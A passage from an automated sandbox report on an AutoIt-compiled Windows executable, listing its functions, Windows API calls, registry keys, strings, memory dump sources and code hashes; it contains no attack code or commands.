                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                • String ID: C:\Users\user\31956653\thjfdg.xcp
                • API String ID: 3170942423-3657453284
                • Opcode ID: caacc7238929fd5a3a737da2130e290da615b983c7f73eae37086701d551b48d
                • Instruction ID: f037a5acacabdbe28416837d39bcfdcffccdf574f0a24977c7b0bcde5f31fc73
                • Opcode Fuzzy Hash: caacc7238929fd5a3a737da2130e290da615b983c7f73eae37086701d551b48d
                • Instruction Fuzzy Hash: E8219475A00219AFCB10DBA4DC84DEFB37DEF88704F108599F909D7250EA74AE41CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FE6C0, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,003FE6A1), ref: 003FE6DD
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,003FE6A1,00000000,?,?,?,003FE6A1), ref: 00417117
                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,003FE6A1,?,00000000,?,?,?,?,003FE6A1), ref: 0041715E
                • RegCloseKey.ADVAPI32(?,?,?,?,003FE6A1), ref: 0041718F
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: QueryValue$CloseOpen
                • String ID: Include$Software\AutoIt v3\AutoIt
                • API String ID: 1586453840-614718249
                • Opcode ID: eae743c07b76f5db882aeaa1b499e6dc460f24c9e73ce70f994d9f3faa321202
                • Instruction ID: e0200c36c6c71a205a6c2b00013c44cf8370abd9e73570caba30d3370bebe3f6
                • Opcode Fuzzy Hash: eae743c07b76f5db882aeaa1b499e6dc460f24c9e73ce70f994d9f3faa321202
                • Instruction Fuzzy Hash: 9D21A571780208BBDB14DBB4DD46FEF737DEF54700F10455AB609E7280EAB5AA418768
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00400350, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                Download Yara Rule
                APIs
                • CreateWindowExW.USER32 ref: 00400385
                • CreateWindowExW.USER32 ref: 004003AE
                • ShowWindow.USER32(?,00000000), ref: 004003C4
                • ShowWindow.USER32(?,00000000), ref: 004003CE
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$CreateShow
                • String ID: AutoIt v3$edit
                • API String ID: 1584632944-3779509399
                • Opcode ID: f41925ed8136a6f6cf6a627129a854539d608a903ccffc781c464abe086f34f0
                • Instruction ID: 800c5779b61260f1979ecda04bb9a2a908fa6b2d55421e8e746eafb94284598d
                • Opcode Fuzzy Hash: f41925ed8136a6f6cf6a627129a854539d608a903ccffc781c464abe086f34f0
                • Instruction Fuzzy Hash: B3F03071BD43107AF7308764AC57F692658A748F55F30482AB704BF5E0D2E4B8408BEC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00422FD3, Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                Download Yara Rule
                APIs
                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004990E8,14000000,0041E1BD), ref: 00422FDD
                • LockServiceDatabase.ADVAPI32(00000000), ref: 00422FEA
                • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00422FF5
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00422FFE
                • GetLastError.KERNEL32 ref: 00423009
                • CloseServiceHandle.ADVAPI32(00000000), ref: 00423019
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                • String ID:
                • API String ID: 1690418490-0
                • Opcode ID: 0cb58ab4a8c4b3c4b552026b5ee2e328f1facdab79e0d40f9158f1d849ec91d9
                • Instruction ID: 3441fdcfb3ddff537c6ccc81f51accc96e9263360e2da9d302aacc9fbc349c12
                • Opcode Fuzzy Hash: 0cb58ab4a8c4b3c4b552026b5ee2e328f1facdab79e0d40f9158f1d849ec91d9
                • Instruction Fuzzy Hash: F7E065316822316BD6211F247E0DBCB37A9EB1A712F040423F745D3250CB9D8985D6BC
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004006E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 004006F7
                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040071E
                • RegCloseKey.KERNELBASE(?), ref: 00400745
                • RegCloseKey.ADVAPI32(?), ref: 00400759
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Close$OpenQueryValue
                • String ID: Control Panel\Mouse
                • API String ID: 1607946009-824357125
                • Opcode ID: 9c8cbf8cb6ecb78f656c1aedc8defb0cf99ab2d54b86d128f31a19229456bc62
                • Instruction ID: 27d5895b85e309b39db152bf9fda0178d58c40d1f37e2752282273646cf6f310
                • Opcode Fuzzy Hash: 9c8cbf8cb6ecb78f656c1aedc8defb0cf99ab2d54b86d128f31a19229456bc62
                • Instruction Fuzzy Hash: 9F118C76640108AFCB10CFA8ED449EFB7BCEF98300B0085AAF90CC3210E6759A51CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FF1D0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 52COMMON
                Download Yara Rule
                APIs
                • _memset.LIBCMT ref: 00419558
                • GetOpenFileNameW.COMDLG32(?,?,?,00000001), ref: 0041959F
                  • Part of subcall function 003FF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\31956653\thjfdg.xcp,003FF1F5,C:\Users\user\31956653\thjfdg.xcp,004990E8,C:\Users\user\31956653\thjfdg.xcp,?,003FF1F5,?,?,00000001), ref: 003FF23C
                  • Part of subcall function 003FF3B0: SHGetMalloc.SHELL32(003FF1FC), ref: 003FF3BD
                  • Part of subcall function 003FF3B0: SHGetDesktopFolder.SHELL32(?,004990E8), ref: 003FF3D2
                  • Part of subcall function 003FF3B0: _wcsncpy.LIBCMT ref: 003FF3ED
                  • Part of subcall function 003FF3B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 003FF427
                  • Part of subcall function 003FF3B0: _wcsncpy.LIBCMT ref: 003FF440
                  • Part of subcall function 003FF290: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 003FF2AB
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen_memset
                • String ID: 0WG$PWG$X
                • API String ID: 2873425188-84834689
                • Opcode ID: edf0bc8fabb6e4f78d1cc134959e3af6dcbaf336d42f15dd4547f3d534cae9d1
                • Instruction ID: 760874db74a9c7264df64acff731b71353c7f5f78893dd94a04b110d9daa1822
                • Opcode Fuzzy Hash: edf0bc8fabb6e4f78d1cc134959e3af6dcbaf336d42f15dd4547f3d534cae9d1
                • Instruction Fuzzy Hash: 6E1186B5A0024CABDB01DFD9D8457EEBBF9AF45304F14801AEA04AF381D7F85449CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00447760, Relevance: 7.7, APIs: 5, Instructions: 217COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _malloc_wcslen$_wcscpy
                • String ID:
                • API String ID: 1511968408-0
                • Opcode ID: bab7f4508cb7d0be97db91e4d74b2ff4f92a9eca4b69cbe47eac94b0a0b190ad
                • Instruction ID: b0691e5b694786d654cb5cefa67738124d96f8c61077798c8e900da68a014a41
                • Opcode Fuzzy Hash: bab7f4508cb7d0be97db91e4d74b2ff4f92a9eca4b69cbe47eac94b0a0b190ad
                • Instruction Fuzzy Hash: 22917DB4600209EFEB10DF69C4C19AABBB5FF49300B50C65AEC469B356DB34F952CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004049DA, Relevance: 7.7, APIs: 5, Instructions: 160COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                • String ID:
                • API String ID: 4048096073-0
                • Opcode ID: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
                • Instruction ID: 073cee32b27f4bd40dc68cd56fab5e80926089beafdeda2a8457aa487f8daefd
                • Opcode Fuzzy Hash: aab6084c32e67cab8a38e491f8e282013bf2e01b8cbd6436e29e8fe851f2c809
                • Instruction Fuzzy Hash: EE51B3B1A00205DBCB249FA9884479EB775AFC0324F24827BEA21762D0D378EE51DF5D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FF490, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 86COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memset$ByteCharMultiWide$_sprintf_strlen_wcslen
                • String ID: C:\Users\user\31956653\thjfdg.xcp$dNG$?T
                • API String ID: 3898977315-3021222585
                • Opcode ID: c8f313a283372a283d5289f392c5eef3cbb430031045c3a2346942793a21f2cd
                • Instruction ID: 1d77facc451e459e2bf1b3a3b00a30b8403c5ced099589b2ce51e06cac4c9ea1
                • Opcode Fuzzy Hash: c8f313a283372a283d5289f392c5eef3cbb430031045c3a2346942793a21f2cd
                • Instruction Fuzzy Hash: 0E2129F2A042015BD314EF759C82AAEF798AF45300F10893FF659D62C2EB38D5948796
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FF180, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 246COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00419524
                  • Part of subcall function 003F35F0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 003F3681
                  • Part of subcall function 003F35F0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003F3697
                  • Part of subcall function 003F35F0: __wsplitpath.LIBCMT ref: 003F36C2
                  • Part of subcall function 003F35F0: _wcscpy.LIBCMT ref: 003F36D7
                  • Part of subcall function 003F35F0: _wcscat.LIBCMT ref: 003F36EC
                  • Part of subcall function 003F35F0: SetCurrentDirectoryW.KERNELBASE(?), ref: 003F36FC
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_wcscat_wcscpy
                • String ID: C:\Users\user\31956653\thjfdg.xcp$DZG
                • API String ID: 2744521063-2490691307
                • Opcode ID: 7c1071d06876fcebedc8fe56c58dcdf30558a33d8aa3184beff8ec31ae19bb72
                • Instruction ID: 78d0f398c7fd5ee5221edacba0e0c3713b0bff2ef465ba2bcf275d7ed30d97e5
                • Opcode Fuzzy Hash: 7c1071d06876fcebedc8fe56c58dcdf30558a33d8aa3184beff8ec31ae19bb72
                • Instruction Fuzzy Hash: 3F917D71900219ABCF04EFA4C8919EE77B8FF48314F14852AF915AB351D778EA46CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F1D10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 003F1D11
                  • Part of subcall function 004014F7: _malloc.LIBCMT ref: 00401511
                • _memmove.LIBCMT ref: 003F1D57
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401546
                  • Part of subcall function 004014F7: std::exception::exception.LIBCMT ref: 00401560
                  • Part of subcall function 004014F7: __CxxThrowException@8.LIBCMT ref: 00401571
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                • String ID: @EXITCODE
                • API String ID: 2734553683-3436989551
                • Opcode ID: 1a844ac73ab799d9daf97c23806e3f3c9fcb079102dc3b8a7e42763821c4ca4c
                • Instruction ID: a5038933e3e0db9c807bb4f37a9eacb04717acbe15f700826befdfbe0e40de44
                • Opcode Fuzzy Hash: 1a844ac73ab799d9daf97c23806e3f3c9fcb079102dc3b8a7e42763821c4ca4c
                • Instruction Fuzzy Hash: 58F06DF2A406419FD764DF75CC42B7776E49B44708F05C83EA08AC6B91FA7DE4828B24
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0042297C, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                Download Yara Rule
                APIs
                • _strlen.LIBCMT ref: 00422991
                • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00444515,00000000,00000000,?,?,?,00444515,?,000000FF), ref: 004229A6
                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00444515,00000000,00000000,000000FF), ref: 004229E5
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharMultiWide$_strlen
                • String ID:
                • API String ID: 1433632580-0
                • Opcode ID: d855715e902909ba5c4b13520abc5195103da0a2e2432e0e4a4c8dc8318303e7
                • Instruction ID: c04f2b93c921a71add8bdeea84ffdb7221f4c33774029ceb29cdce81b30388da
                • Opcode Fuzzy Hash: d855715e902909ba5c4b13520abc5195103da0a2e2432e0e4a4c8dc8318303e7
                • Instruction Fuzzy Hash: F301F2773401243BE7105A69AC86FABBB5CDBC8B74F45013AFA0CDB2D0E9F5A84042A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FFE20, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 003FFE35
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,004443ED,?,00000000,?,?), ref: 003FFE4E
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 003FFE77
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharMultiWide$_wcslen
                • String ID:
                • API String ID: 2761822629-0
                • Opcode ID: ccbf68d4584dd90a68ac8b07a54d9dd04a6f87436367101d9e6a4cf37908b92b
                • Instruction ID: 66935d2630031be9bb0e82492b7c2e89469aadfac9a6c59e868c595fed18f05b
                • Opcode Fuzzy Hash: ccbf68d4584dd90a68ac8b07a54d9dd04a6f87436367101d9e6a4cf37908b92b
                • Instruction Fuzzy Hash: BB01AE727402187AE63055B95C46F67B25CDF96B65F10027AFF18F62E1E5F1AC0081E9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F3B40, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52fileCOMMON
                Download Yara Rule
                APIs
                • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 003F3B92
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileRead
                • String ID: <?
                • API String ID: 2738559852-98613009
                • Opcode ID: 9650ba35a1d3cec3c68dde127c2c8aa623ace3a76a8240eff7d9097a7d240925
                • Instruction ID: 3b4d009dffff7b11c6fa814a972c254465a1251a3bc9970aef74335ff85782fa
                • Opcode Fuzzy Hash: 9650ba35a1d3cec3c68dde127c2c8aa623ace3a76a8240eff7d9097a7d240925
                • Instruction Fuzzy Hash: 76110670600B059FD721CF55C9A0B67B7F8EF44750F10892EEA9A87A50D770EE45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F2AB0, Relevance: 3.5, APIs: 2, Instructions: 463COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: std::exception::exception$Exception@8Throw_malloc
                • String ID:
                • API String ID: 2388904642-0
                • Opcode ID: 90f1591a5f11810156c75e1c41b1a276a4edfa457b1fb6d8ee243b0a6f6c6bca
                • Instruction ID: fbcf544b34a903846ba6119a8f78bd7d4ef4024a7d330e83614a443b313d9fbb
                • Opcode Fuzzy Hash: 90f1591a5f11810156c75e1c41b1a276a4edfa457b1fb6d8ee243b0a6f6c6bca
                • Instruction Fuzzy Hash: 3DF1917590420DDBCB16EF54C8819FFB3B4EF04300F61846AEA55AB261D739EE82CB95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FB1F0, Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                • Opcode ID: de420cf1887bd3a2df787e09b37c8fbd105f0bd477717db34b191bd6103c8b84
                • Instruction ID: 516457dd0366413c76e1535db5ce94ea4b2516402e3fadb7722df5cad8efc330
                • Opcode Fuzzy Hash: de420cf1887bd3a2df787e09b37c8fbd105f0bd477717db34b191bd6103c8b84
                • Instruction Fuzzy Hash: AC91BFB4A00108DBDB11DF68C885AAEB3F9AF09304F24C46BE905AB761D739EC81CB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FC440, Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
                • Instruction ID: bbd8f9beaf722df8e0adb71cecd4bd829d01a3f44442575ae37387e99f6292df
                • Opcode Fuzzy Hash: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
                • Instruction Fuzzy Hash: 0851C671A00209ABDB15DF65C891FBBB3B8BF44304F04805AFA199B252E778ED80C7A4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00456C11, Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 1ad3a44186d05c6fab3d9e27d893933ba6d7717b9c82e6532c1503be7e0d0675
                • Instruction ID: 057e5318eb019bd30592a98ac92c1082ede7963816b4c9151250687bd0fbcf82
                • Opcode Fuzzy Hash: 1ad3a44186d05c6fab3d9e27d893933ba6d7717b9c82e6532c1503be7e0d0675
